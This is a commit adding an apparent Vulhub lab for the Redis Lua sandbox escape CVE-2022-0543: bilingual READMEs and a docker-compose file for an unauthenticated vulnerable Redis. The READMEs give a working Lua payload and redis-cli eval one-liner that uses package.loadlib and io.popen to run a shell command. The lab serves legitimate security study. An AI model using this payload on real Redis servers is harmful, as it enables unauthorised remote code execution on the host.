first commit

redis/CVE-2022-0543/README.md

@@ -0,0 +1,53 @@
+# Redis Lua Sandbox Escape and Remote Code Execution (CVE-2022-0543)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache, and message broker.
+
+Reginaldo Silva discovered that due to a packaging issue on Debian/Ubuntu, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host.
+
+References:
+
+- <https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>
+- <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787>
+
+## Vulnerability Environment
+
+Execute following command to start a redis server 5.0.7 on Ubuntu:
+
+```
+docker compose up -d
+```
+
+After server is started, you can connect to this server without credentials by `redis-cli`:
+
+```
+redis-cli -h your-ip
+```
+
+## Exploit
+
+This vulnerability existed because the Lua library in Debian/Ubuntu is provided as a dynamic library. A `package` variable was automatically populated that in turn permitted access to arbitrary Lua functionality.
+
+As this extended to, for example, you can use `package.loadlib` to load the modules from liblua, then use this module to execute the commands:
+
+```lua
+local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
+local io = io_l();
+local f = io.popen("id", "r");
+local res = f:read("*a");
+f:close();
+return res
+```
+
+Noted that you should specify a correct realpath for the `liblua` library. In this Vulhub environment (Ubuntu focal), the value is `/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`.
+
+Eval this script in redis shell:
+
+```lua
+eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
+```
+
+Execute the commands successful:
+
+![](1.png)

redis/CVE-2022-0543/README.zh-cn.md

@@ -0,0 +1,45 @@
+# Redis Lua沙盒绕过命令执行（CVE-2022-0543）
+
+Redis是著名的开源Key-Value数据库，其具备在沙箱中执行Lua脚本的能力。
+
+Debian以及Ubuntu发行版的源在打包Redis时，不慎在Lua沙箱中遗留了一个对象`package`，攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数，进而逃逸沙箱执行任意命令。
+
+参考链接：
+
+- <https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>
+- <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787>
+
+## 漏洞环境
+
+执行如下命令启动一个使用Ubuntu源安装的Redis 5.0.7服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，我们可以使用`redis-cli -h your-ip`连接这个redis服务器。
+
+## 漏洞复现
+
+我们借助Lua沙箱中遗留的变量`package`的`loadlib`函数来加载动态链接库`/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`里的导出函数`luaopen_io`。在Lua中执行这个导出函数，即可获得`io`库，再使用其执行命令：
+
+```lua
+local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io");
+local io = io_l();
+local f = io.popen("id", "r");
+local res = f:read("*a");
+f:close();
+return res
+```
+
+值得注意的是，不同环境下的liblua库路径不同，你需要指定一个正确的路径。在我们Vulhub环境（Ubuntu fiocal）中，这个路径是`/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`。
+
+连接redis，使用`eval`命令执行上述脚本：
+
+```lua
+eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res' 0
+```
+
+可见命令已成功执行：
+
+![](1.png)

redis/CVE-2022-0543/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ redis:
+   image: vulhub/redis:5.0.7
+   ports:
+    - "6379:6379"